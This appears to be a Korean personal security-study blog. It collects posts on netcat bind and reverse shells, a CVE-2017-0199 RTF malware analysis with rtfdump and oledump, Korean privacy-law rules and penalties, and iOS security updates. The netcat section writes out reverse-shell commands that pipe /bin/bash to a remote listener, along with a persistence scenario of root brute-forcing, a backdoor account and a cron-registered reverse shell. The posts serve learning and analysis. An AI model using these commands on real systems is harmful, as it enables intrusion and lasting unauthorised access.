꼰머의 보안공부

1. Netcat (nc)

- TCP 또는 UDP를 사용하여 네트워크 연결을 읽거나 기록하는 컴퓨터 네트워킹 유틸리티

- UNIX의 cat과 유사하며, cat 명령으로 파일을 읽거나 쓰듯이 NC는 Network Connection에 읽거나 씀

- 스크립트와 병용하여 network에 대한 debugging, testing tool로써 매우 편리하지만 반면 해킹에서도 자주 사용

1.1 주요 옵션

1.2 바인드쉘

- 일반적인 연결 상태로, 클라이언트가 서버에 접속

- 서버: nc -lnvp 1234 -e /bin/bash
- 클라이언트: nc <서버 IP> 1234

1.3 리버스쉘

- 바인드쉘과 반대로 서버가 클라이언트에 접속, -e 옵션에 의해 클라이언트에서 작업이 수행됨

> 예시의 경우 클라이언트의 /bin/bash가 실행

> 공격자의 PC가 서버가되고, 피해자의 PC가 클라이언트가 되어 명령을 실행

- 서버: nc -lnvp 1234
- 클라이언트: nc <서버 IP> 1234 -e /bin/bash

- 일반적으로 방화벽은 네트워크 최상단에 설치되어 외부에서 내부로 들어오는 연결을 차단

> 반대로 내부에서 외부로 나가는 연결에 대해서는 상대적으로 허용하는 경우가 많음

> 이를 이용해 공격자는 공격 PC를 서버로 동작시킨 뒤, 피해 PC에서 명령 실행 및 공격 PC로 접근해 쉘을 획득

- 일반적인 리버스쉘 시나리오는 다음과 같음

① 공격자는 내부 네트워크에 침입한 후 무차별대입공격으로 root 계정 탈취

② 반복적인 침입을 위해 root 계정을 이용해 root 권한을 가지는 일반 사용자 계정 생성

③ netcat 프로그램을 이용한 리버스쉘 연결 작업을 cron table에 등록(/etc/crontab)

④ 공격자는 주기적으로 shell을 획득해 추가 명령 수행

2. -e 옵션

- 앞서 살펴보았듯이 -e 옵션은 연결을 생성한 후 실행할 명령 등의 작업을 지정함

- 침해 상황을 가정해 nc를 통해 리버스쉘 연결을 시도한 결과 -e 옵션이 유효하지 않다고 확인됨

- 구글링을 해보니 비활성화된 (또는 지원하지 않는) 버전의 nc를 사용한 결과라고 함

> 따라서, -e 옵션을 지원하는 nc 버전 (netcat-traditional)을 설치하고, 해당 버전으로 설정해야 함

# sudo apt-get install -y netcat-traditional
# sudo update-alternatives --config nc

- 두 번째 명령 실행 결과를 확인해보면 현재 /bin/nc.openbsd 버전을 사용하고 있는 것으로 확인 됨

> 설치한 netcat-traditional (nc.traditional)으로 변경

- 변경 후 -e 옵션을 실행하면 정상적으로 리버스쉘이 생성됨

1.보호조치 기준 개요

- 개인정보의 안전성 확보조치 기준과 개인정보의 기술적ㆍ관리적 보호조치 기준으로 구분할 수 있음

- 기준별 보호조치 요약

- 개인정보의 안전성 확보조치 기준 유형 분류 기준

- 개인정보의 기술적ㆍ관리적 보호조치 기준 적용 대상자

참고

휴대폰에 업데이트 알람이 떠서 확인해보니 보안 대응 업데이트 였다. 조금 찾아봤더니 작년 iOS16 공개와 함께 처음 선보였다고 한다. 정규 업데이트와는 별개로, 장치와 소프트웨어의 보안 문제를 개선 또는 수정하는 내용을 담고 있다고 한다. 그래서 그런지 업데이트 크기가 약 100MB 였고, 순식간에 완료가 되었다.

사파리 웹 브라우저와 Webkit 프레임 워크 스택 또는 기타 중요한 시스템 라이브러리에 대한 개선 사항이 업데이트되는 것이라고 한다. 또한 악용되었거나 존재한다고 보고된 문제 등 일부 보안 문제를 더 빠르게 완화하는 데에도 사용할 수 있다고 한다.

설정 > 소프트웨어 업데이트 > 자동 업데이트 > 보안 대응 및 시스템 파일에서 비활성화할 수 있다. 하지만, 보안과 개인정보를 안전하게 유지하기 위해서는 해당 기능을 활성화하고, 주기적으로 업데이트를 확인하고 적용하는 것이 필요할 것 같다. 또한, 취지에서도 알 수 있듯이 소프트웨어 업데이트 사이에 중요한 보안 개선 사항을 설치하는 기능인만큼 활성화해 두는 것이 좋을 것 같다.

1. 분석 도구

1.1 Virus Total [1]

- 무료로 파일 검사를 제공하는 웹사이트로, 파일, URL 내의 바이러스를 검사해주는 사이트 (IP 조회도 가능)

1.2 HxD [2]

- 파일에 저장된 HEX(16진수) 값을 읽고 수정하는데 이용

1.3 rtfdump.py [3][4]

- Github에서 다운받을 수 있는 파이썬으로 작성된 RTF 파일을 분석하는데 사용되는 Open Source

1.4 oledump.py [8]

- OLE 파일을 분석하는 프로그램

2. 분석

① Virus Total 조회

- 실습에서 진행한 RTF 파일을 Virus Total에서 조회한 결과는 다음과 같음

> 58개의 벤더사 중 39개의 벤더사가 악성 파일로 탐지

> 탐지명을 확인해보면 CVE-2017-0199와 관련된 것임을 알 수 있음

② 파일 속성 및 HxD 조회

- 파일 속성과 HxD 확인 결과 해당 파일이 RTF 파일임을 확인

> RTF 파일은 파일 시그니처로 7B 5C 72 74 66 31 ({rtf1)를 가짐 [5]

③ rtfdump.py 파일 덤프

- 먼저 -m 옵션을 사용해 rtfdump.py의 사용법에 대해 확인

- yeahhub.rtf 파일 덤프 결과 문서에 포함된 객체들이 조회됨

> [사진 5]를 통해 RTF 문서에서 원격 객체와 연결을 하기위해 "objautlink"를 사용하며, 그 중 "objdata"에 OLE 객체를 포함하고 있는것을 확인 [6]

> objautlink ⊃ objdata ⊃ OLE 객체로 정리함

※ [사진 4]에서 첫 번째 열의 숫자는 rtfdump에서 파생된 출력 값으로 파일의 일부가 아님

- 분석 후 추가 구글링 결과 rtfdump.py의 경우 아래 명령으로 문서에 포함된 OLE 객체를 찾을 수 있다고 확인됨

rtfdump.py -f O 파일명

- [사진 4]에서 확인된 objdata의 값을 -s 옵션으로 확인한 결과 "01050000 02000000"이 확인

> "01050000 02000000"는 각각 01050000 OLE 버전 정보, 02000000 임베디드 객체를 뜻함 [7]

> -H 명령을 추가해 확인하면 더욱 명확히 OLE 객체임을 알 수 있음

④ oledump.py

- [사진 7]의 결과에서 두 가지 옵션 추가 및 "|"를 사용해 oledump.py의 입력으로 전달

> -E: 포함된 객체 덤프

> -d: 출력된 내용 덤프

※ [사진 8]에서 첫 번째 열의 숫자는 oledump에서 파생된 출력 값으로 파일의 일부가 아님

- -s 옵션으로 각각의 스트림을 확인한 결과 첫 번째 스트림에서 악성 URL 확인

- [사진 9]에서 확인된 악성 URL로 HTA 파일을 요청하고, HTA 파일에 포함된 리버스쉘 생성 명령이 실행

3. 참고

[1] https://www.virustotal.com/gui/home/upload
[2] https://mh-nexus.de/en/hxd/
[3] https://github.com/DidierStevens/DidierStevensSuite/blob/master/rtfdump.py
[4] https://blog.didierstevens.com/2016/07/29/releasing-rtfdump-py/
[5] http://forensic-proof.com/archives/300
[6] https://www.mcafee.com/blogs/other-blogs/mcafee-labs/an-inside-look-into-microsoft-rich-text-format-and-ole-exploits/
[7] https://github.com/houjingyi233/office-exploit-case-study/blob/master/CVE-2017-11882%26CVE-2018-0802%26CVE-2018-0798/cve-2018-0802%20poc%20with%20comments.rtf
[8] https://github.com/DidierStevens/DidierStevensSuite/blob/master/oledump.py

보안뉴스

보안뉴스

지난달 14일, 22일에 한국인터넷진흥원 침해센터에 문의한 내용에대한 답변을 받았다. 결론부터 말하면 해당 사안의 경우 개인정보호법 제29조 안전조치의무를 위반하는 행위에 속한다는 것이다. 처음 문의를 할 때, 문의 내용과 관련된 사례를 찾아보았고, 이미 문의 내용이 개인정보보호법을 위반한 것이라고 생각했다.

개인정보보호법에서는 제29조 안전조치의무 위반에 대한 벌금과 과태료를 규정하고 있다.

제73조(벌칙) 다음 각 호의 어느 하나에 해당하는 자는 2년 이하의 징역 또는 2천만원 이하의 벌금에 처한다.
1. 제23조제2항, 제24조제3항, 제25조제6항, 제28조의4제1항 또는 제29조를 위반하여 안전성 확보에 필요한 조치를 하지 아니하여 개인정보를 분실ㆍ도난ㆍ유출ㆍ위조ㆍ변조 또는 훼손당한 자

제75조(과태료) ① 다음 각 호의 어느 하나에 해당하는 자에게는 5천만원 이하의 과태료를 부과한다.
6. 제23조제2항, 제24조제3항, 제25조제6항, 제28조의4제1항 또는 제29조를 위반하여 안전성 확보에 필요한 조치를 하지 아니한 자

개인정보보호법에서는 법 위반에 따른 제재 또는 처벌로 벌금, 과징금, 과태료를 규정하고 있으며, 각각의 특징을 정리하면 다음과 같다. 벌금의 경우 전과기록이 남고, 과태료와 과징금의 경우 의무위반에 따른 금전적인 벌이기 때문에, 처벌의 무게는 벌금 > 과태료 = 과징금인것 같다.

① 벌금

- 과태료, 과징금에 비해 가장 강력한 재산형

- 법을 어긴 경우 적용되는 형벌이며, 형벌 중 금전적인 벌에 해당

- 형사처분이므로 벌금형을 받을 경우 전과기록이 남음

② 과태료

- 행정법상 의무위반에 대한 제재로 부과되는 금전적인 벌

- 이익 여부와 상관없이 행정상 질서를 유지하기 위해 내리는 징계

- 행정처분이므로 전과기록이 남지 않음

③ 과징금

- 행정법상 의무위반에 대한 제재로 부과되는 금전적인 벌

- 주로 불법으로 얻은 경제적 이익을 환수하기 위해 처분

- 행정 제재와 부당 이득 환수라는 두 가지 성격을 가짐

만약 해당 사안을 개인정보 유출로 신고한다면 어떠한 제재나 처벌을 받을지 고민해 보았다. 구체적으로 "A를 위반하면 B에 처한다"로 규정하지 않고 여러 조항에 걸쳐 "A를 위반하면 B, C에 처한다" 처럼 규정하고 있다. 따라서, 위반행위의 종류, 내용, 경위, 지속기간, 빈도, 주체, 피해자, 해당 기관의 개인정보 보호 관리체계 및 조치 등을 종합적으로 고려하여 경중을 따져 벌금, 과태료, 과징금 중에서 가장 합당한 처벌을 부과하는 것 같다고 생각한다.